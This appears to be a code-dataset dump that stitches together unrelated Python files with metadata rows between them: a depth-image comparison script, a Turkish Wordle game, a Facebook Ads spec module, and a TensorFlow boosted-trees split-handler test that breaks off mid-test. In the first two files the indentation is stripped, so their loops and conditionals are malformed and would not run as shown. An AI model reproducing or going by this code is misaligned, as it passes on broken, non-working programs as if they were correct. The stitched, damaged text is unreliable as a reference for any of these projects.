opengl_path = "/home/jerry/Pictures/point_0_view_2_domain_fixatedpose_mist.png"
#blender_path = "/home/jerry/Desktop/Data/1CzjpjNF8qk/depth/point_0_view_2_domain_depth.png"
blender_path = "/home/jerry/Desktop/Data/1CzjpjNF8qk/mist/point_0_view_2_domain_mist.png"
outline_path = "/home/jerry/Pictures/point_0_view_2_domain_outline.png"
opengl_viz = "/home/jerry/Pictures/point_0_view_2_domain_viz.png"
opengl_img = Image.open(opengl_path)
blender_img = Image.open(blender_path)
opengl_arr = np.asarray(opengl_img)
blender_arr = np.asarray(blender_img)
## Opengl: opengl_arr[:, :, 0]
## Blender: blender_arr
#opengl_arr = opengl_arr[:, :, 0].reshape((1, -1))[0] ## fpa version
# quick fix for visualization
## TODO: cpp png saving upside down
#opengl_arr
opengl_arr = opengl_arr[::-1][:]
#print(opengl_arr.shape, blender_arr.shape)
outline_arr = opengl_arr.copy()
for row in range(opengl_arr.shape[0]):
for col in range(opengl_arr.shape[1]):
if np.abs(opengl_arr[row][col] - blender_arr[row][col]) > 3:
print(opengl_arr[row][col], blender_arr[row][col])
outline_arr[row][col] = 65535
im = Image.new('L', (512, 512))
im.putdata(outline_arr.flatten().tolist())
im.save(outline_path)
viz_arr = opengl_arr.copy()
viz_arr = viz_arr * 128.0 / 65535
viz_arr = np.power(viz_arr, 5)
print(viz_arr)
im = Image.new('L', (512, 512))
im.putdata(viz_arr.flatten().tolist())
im.save(opengl_viz)
opengl_arr = opengl_arr.reshape((1, -1))[0] ## png version
blender_arr = blender_arr.reshape((1, -1))[0]
print("before clamping, max blender: ", max(blender_arr))
print(opengl_arr)
print(np.min(opengl_arr), np.max(opengl_arr), len(opengl_arr))
print(np.min(blender_arr),np.max(blender_arr), len(blender_arr))
diff_count = np.sum((opengl_arr != blender_arr))
diff_sqsum = np.sum(np.square(opengl_arr - blender_arr))
total_count = len(opengl_arr)
total_sqsum = np.sum(np.square(opengl_arr))
print('How many different', diff_count, float(diff_count) / total_count)
print('Total square diff', diff_sqsum, float(diff_sqsum) / total_sqsum)
blender_arr = blender_arr[blender_arr < 65535]
plt.subplot(2, 1, 1)
n, bins, patches = plt.hist(opengl_arr, 50, normed=1, label='opengl', alpha=0.75)
plt.legend(loc='upper right')
plt.subplot(2, 1, 2)
n, bins, patches = plt.hist(blender_arr, 50, normed=1, label='blender', alpha=0.75)
plt.legend(loc='upper right')
plt.show()
| 30.857143 | 92 | 0.735725 |
4a1b517d55a8b6f0d887ef5f092defbbb5bb85b5 | 2,082 | py | Python | wordle/human_input.py | bbayramoglu/repPython | e8f0bc0f492d10f77ee907fa976e3715600ed4a1 | ["MIT"] | null | null | null | wordle/human_input.py | bbayramoglu/repPython | e8f0bc0f492d10f77ee907fa976e3715600ed4a1 | ["MIT"] | null | null | null | wordle/human_input.py | bbayramoglu/repPython | e8f0bc0f492d10f77ee907fa976e3715600ed4a1 | ["MIT"] | null | null | null |
from pc_job import Listing, Split_word, Select_word
from colorama import Fore, Style
used_right=0
guess = []
right_p=["","","","",""]
falses=[]
main_w=Split_word.splittedWord
#print(main_w)
while True:
false_p=["","","","",""]
if main_w==right_p:
print(f"{Fore.BLUE}Tebrikler kelimeyi buldunuz{Style.RESET_ALL}")
break
if used_right>=6:
print(f"{Fore.RED}Hakkınız kalmadı günün kelimesi:{Style.RESET_ALL}{Fore.YELLOW} {Select_word.word} {Style.RESET_ALL}")
break
g2=input("5 harfli bir kelime giriniz: ")
with open("C:/Users/Furkan/Desktop/docs/anna/wordle/words_entered.txt","a+",encoding="utf-8") as file:
if len(g2)==5 and g2 not in file:
file.write(f"{g2}\n")
g1=g2.strip().lower()
if g1 == "ok":
break
elif g1 not in Listing.words:
print(f"{Fore.RED}Listede olmayan bir kelime girdiniz. Tekrar giriniz{Style.RESET_ALL}")
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
else:
li=[]
for i in g1:
li.append(i)
if li in guess:
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
print("Önceden girdiğiniz kelimeyi giremezsiniz.")
else:
used_right+=1
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
guess.append(li)
for i in range(0,len(guess)):
for j in range (0,len(main_w)):
if guess[i][j] in main_w:
if guess[i][j]==main_w[j]:
right_p[j]=guess[i][j]
elif guess[i][j] !=main_w:
false_p=["","","","",""]
false_p[j]=guess[i][j]
falses.append(false_p)
print(f"{Fore.GREEN}{right_p}{Style.RESET_ALL}")
for i in falses:
print(f"{Fore.YELLOW}{i}{Style.RESET_ALL}")
| 39.283019 | 128 | 0.540346 |
4a1b52304c3af41eda1b20101e29cc3b1c6541e5 | 3,081 | py | Python | python/facebookads/specs.py | wangqi/facebookads | 74cc2a78d870ba059472870fd20b3147b32bf1ce | ["Apache-2.0"] | 4 | 2016-06-01T04:37:31.000Z | 2018-02-15T06:47:01.000Z | python/facebookads/specs.py | wangqi/facebookads | 74cc2a78d870ba059472870fd20b3147b32bf1ce | ["Apache-2.0"] | null | null | null | python/facebookads/specs.py | wangqi/facebookads | 74cc2a78d870ba059472870fd20b3147b32bf1ce | ["Apache-2.0"] | null | null | null |
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
specs module contains classes that help you define and create specs for use
in the Ads API.
"""
from facebookads.objects import AbstractObject
from facebookads.mixins import ValidatesFields
class ObjectStorySpec(ValidatesFields, AbstractObject):
class Field(object):
link_data = 'link_data'
offer_data = 'offer_data'
page_id = 'page_id'
photo_data = 'photo_data'
text_data = 'text_data'
video_data = 'video_data'
class AttachmentData(ValidatesFields, AbstractObject):
class Field(object):
description = 'description'
image_hash = 'image_hash'
link = 'link'
name = 'name'
picture = 'picture'
class LinkData(ValidatesFields, AbstractObject):
class Field(object):
call_to_action = 'call_to_action'
caption = 'caption'
child_attachments = 'child_attachments'
description = 'description'
image_hash = 'image_hash'
image_crops = 'image_crops'
link = 'link'
message = 'message'
name = 'name'
picture = 'picture'
class OfferData(ValidatesFields, AbstractObject):
class Field(object):
barcode_type = 'barcode_type'
barcode = 'barcode'
claim_limit = 'claim_limit'
coupon_type = 'coupon_type'
expiration_time = 'expiration_time'
image_url = 'image_url'
message = 'message'
reminder_time = 'reminder_time'
redemption_link = 'redemption_link'
redemption_code = 'redemption_code'
title = 'title'
class PhotoData(ValidatesFields, AbstractObject):
class Field(object):
caption = 'caption'
url = 'url'
class TextData(ValidatesFields, AbstractObject):
class Field(object):
message = 'message'
class VideoData(ValidatesFields, AbstractObject):
class Field(object):
call_to_action = 'call_to_action'
description = 'description'
image_url = 'image_url'
title = 'title'
video_id = 'video_id'
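# Minimal usage sketch (hypothetical IDs and URLs, for illustration only): the Field
# constants above are intended as keys when assembling a creative's story spec, e.g.
#
#   link_data = {
#       LinkData.Field.link: 'http://example.com',
#       LinkData.Field.message: 'Check this out',
#   }
#   story = {
#       ObjectStorySpec.Field.page_id: '<PAGE_ID>',
#       ObjectStorySpec.Field.link_data: link_data,
#   }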
| 32.09375 | 76 | 0.691659 |
4a1b528646e7d2139d7eabb0264b8d280f8da133 | 68,682 | py | Python | tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py | PaulWang1905/tensorflow | ebf12d22b4801fb8dab5034cc94562bf7cc33fa0 | ["Apache-2.0"] | 36 | 2016-12-17T15:25:25.000Z | 2022-01-29T21:50:53.000Z | tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py | PaulWang1905/tensorflow | ebf12d22b4801fb8dab5034cc94562bf7cc33fa0 | ["Apache-2.0"] | 59 | 2019-06-17T09:37:49.000Z | 2022-01-19T01:21:34.000Z | tensorflow/contrib/boosted_trees/lib/learner/batch/ordinal_split_handler_test.py | PaulWang1905/tensorflow | ebf12d22b4801fb8dab5034cc94562bf7cc33fa0 | ["Apache-2.0"] | 36 | 2017-07-27T21:12:40.000Z | 2022-02-03T16:45:56.000Z |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test for checking stats accumulator related ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.boosted_trees.lib.learner.batch import ordinal_split_handler
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.boosted_trees.proto import split_info_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resources
from tensorflow.python.platform import googletest
def get_empty_tensors(gradient_shape, hessian_shape):
empty_hess_shape = [1] + hessian_shape.as_list()
empty_grad_shape = [1] + gradient_shape.as_list()
empty_gradients = constant_op.constant_v1(
[], dtype=dtypes.float32, shape=empty_grad_shape)
empty_hessians = constant_op.constant_v1(
[], dtype=dtypes.float32, shape=empty_hess_shape)
return empty_gradients, empty_hessians
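# For reference, the expected values in the comments below follow the usual
# L1/L2-regularized leaf formulas (a sketch; l1 and l2 are the handler's
# l1_regularization and l2_regularization settings):
#   weight = -shrunk_grad / (hess_sum + l2), where shrunk_grad is grad_sum moved
#            toward zero by l1
#   gain   = weight * -shrunk_grad
# e.g. partition 0's left child in the first test: -(1.2 - 0.1) / (0.2 + 1) = -0.91666.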
class DenseSplitHandlerTest(test_util.TensorFlowTestCase):
def testGenerateFeatureSplitCandidates(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight = -0.91666
# expected_left_weight * -(1.2 - 0.1)
expected_left_gain = 1.0083333333333331
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight = 0.1680672
# expected_right_weight * -(-0.5 + 0.2 + 0.1))
expected_right_gain = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.46043165467625885
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0],
0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-4 + 0.1) / (0.13 + 1)
expected_left_weight = -3.4513274336283186
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_left_gain = 13.460176991150442
expected_right_weight = 0
expected_right_gain = 0
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain = 13.460176991150442
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(0.0, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testObliviousFeatureSplitGeneration(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 1 | 3 |
# i1 | (-0.5, 0.07) | 1 | 3 |
# i2 | (1.2, 0.2) | 1 | 1 |
# i3 | (4.0, 0.13) | 2 | 2 |
dense_column = array_ops.placeholder(
dtypes.float32, shape=(4, 1), name="dense_column")
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([1, 1, 1, 2], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
weak_learner_type=learner_pb2.LearnerConfig.OBLIVIOUS_DECISION_TREE)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
# Forcing the creation of four buckets.
are_splits_ready = sess.run(
[are_splits_ready],
feed_dict={dense_column: [[0.2], [0.62], [0.3], [0.52]]})[0]
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
# Only using the last three buckets.
are_splits_ready2, partitions, gains, splits = (
sess.run(
[are_splits_ready2, partitions, gains, splits],
feed_dict={dense_column: [[0.62], [0.62], [0.3], [0.52]]}))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([1, 2], partitions)
oblivious_split_info = split_info_pb2.ObliviousSplitInfo()
oblivious_split_info.ParseFromString(splits[0])
split_node = oblivious_split_info.split_node
split_node = split_node.oblivious_dense_float_binary_split
self.assertAllClose(0.3, split_node.threshold, 0.00001)
self.assertEqual(0, split_node.feature_column)
# Check the split on partition 1.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight_1 = -0.9166666666666666
# expected_left_weight_1 * -(1.2 - 0.1)
expected_left_gain_1 = 1.008333333333333
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight_1 = 0.1680672
# expected_right_weight_1 * -(-0.5 + 0.2 + 0.1))
expected_right_gain_1 = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain_1 = 0.46043165467625896
left_child = oblivious_split_info.children[0].vector
right_child = oblivious_split_info.children[1].vector
self.assertAllClose([expected_left_weight_1], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight_1], right_child.value, 0.00001)
# Check the split on partition 2.
expected_left_weight_2 = 0
expected_left_gain_2 = 0
# -(4 - 0.1) / (0.13 + 1)
expected_right_weight_2 = -3.4513274336283186
# expected_right_weight_2 * -(4 - 0.1)
expected_right_gain_2 = 13.460176991150442
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain_2 = 13.460176991150442
left_child = oblivious_split_info.children[2].vector
right_child = oblivious_split_info.children[3].vector
self.assertAllClose([expected_left_weight_2], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight_2], right_child.value, 0.00001)
# The layer gain is the sum of the gains of each partition
layer_gain = (
expected_left_gain_1 + expected_right_gain_1 - expected_bias_gain_1) + (
expected_left_gain_2 + expected_right_gain_2 - expected_bias_gain_2)
self.assertAllClose(layer_gain, gains[0], 0.00001)
# We have examples in both partitions, then we get both ids.
self.assertEqual(2, len(oblivious_split_info.children_parent_id))
self.assertEqual(1, oblivious_split_info.children_parent_id[0])
self.assertEqual(2, oblivious_split_info.children_parent_id[1])
def testGenerateFeatureSplitCandidatesLossUsesSumReduction(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.2,
l2_regularization=2.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
loss_uses_sum_reduction=True)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
update_3 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2, update_3]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(2.4 - 0.2) / (0.4 + 2)
expected_left_weight = -0.91666
# expected_left_weight * -(2.4 - 0.2)
expected_left_gain = 2.016666666666666
# -(-1 + 0.4 + 0.2) / (0.38 + 2)
expected_right_weight = 0.1680672
# expected_right_weight * -(-1 + 0.4 + 0.2)
expected_right_gain = 0.0672268907563025
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.9208633093525178
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0],
0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-8 + 0.2) / (0.26 + 2)
expected_left_weight = -3.4513274336283186
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(0.0, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testGenerateFeatureSplitCandidatesMulticlassFullHessian(self):
with self.cached_session() as sess:
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
# Batch size is 4, 2 gradients per each instance.
gradients = array_ops.constant(
[[0.2, 0.1], [-0.5, 0.2], [1.2, 3.4], [4.0, -3.5]], shape=[4, 2])
# 2x2 matrix for each instance
hessian_0 = [[0.12, 0.02], [0.3, 0.11]]
hessian_1 = [[0.07, -0.2], [-0.5, 0.2]]
hessian_2 = [[0.2, -0.23], [-0.8, 0.9]]
hessian_3 = [[0.13, -0.3], [-1.5, 2.2]]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2, 2])
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=3,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.FULL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 1e-6)
def testGenerateFeatureSplitCandidatesMulticlassDiagonalHessian(self):
with self.cached_session() as sess:
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
# Batch size is 4, 2 gradients per each instance.
gradients = array_ops.constant(
[[0.2, 0.1], [-0.5, 0.2], [1.2, 3.4], [4.0, -3.5]], shape=[4, 2])
# Each hessian is a diagonal of a full hessian matrix.
hessian_0 = [0.12, 0.11]
hessian_1 = [0.07, 0.2]
hessian_2 = [0.2, 0.9]
hessian_3 = [0.13, 2.2]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
class_id = -1
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2])
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=3,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Each leaf has 2 element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 1e-6)
def testGenerateFeatureSplitCandidatesInactive(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
